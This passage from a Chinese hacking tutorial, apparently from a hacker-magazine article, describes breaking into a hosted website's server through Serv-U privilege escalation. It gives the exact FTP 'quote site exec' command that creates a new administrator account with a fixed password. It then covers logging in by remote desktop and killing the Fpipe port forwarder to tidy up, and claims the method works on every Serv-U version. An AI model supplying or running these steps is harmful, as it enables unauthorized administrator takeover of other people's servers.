瞧！我是怎样轻轻松松入侵你DJ

图17

图18

“开始”-“运行”-“FTPwww.xxx.com”，输入刚才新建FTP用户和密码，因为对方开了3389，所以连接上后执行“quote site exec net user Tommie nohack /add & net localgroup administrators Tommie /add”，返回“200 EXEC command successful”说明成功添加了一个用户是Tommie密码为nohack的管理员，如图19。

图19

登陆3389，打开“任务管理器”-“进程”，勾选“显示所有用户的进程”，找到转发工具的进程Fpipe.exe结束之，如图20，

图20

使IIS再次恢复正常工作。

图21

感想

这次入侵让我回想起Gene6的提权，虽然虚拟主机的目录权限早已设置得死死的，但兴幸的是Documents这样的目录并没有被设置，而且Serv-U默认只允许127.0.0.1（也就是本地，当然，你也可以把Serv-U设置成0.0.0.0这样，也就是无限制连接）访问43958端口，所以可以通过转发来解决来这个问题。经过多个版本的测试，这个目录无修改权限的提权方法是通杀所有版本的。前提服务器必须要支持WScript.Shell组件或支持执行命令。最后文章有不清楚的朋友可以直接到黑客手册论坛找我。论坛Id:Tommie。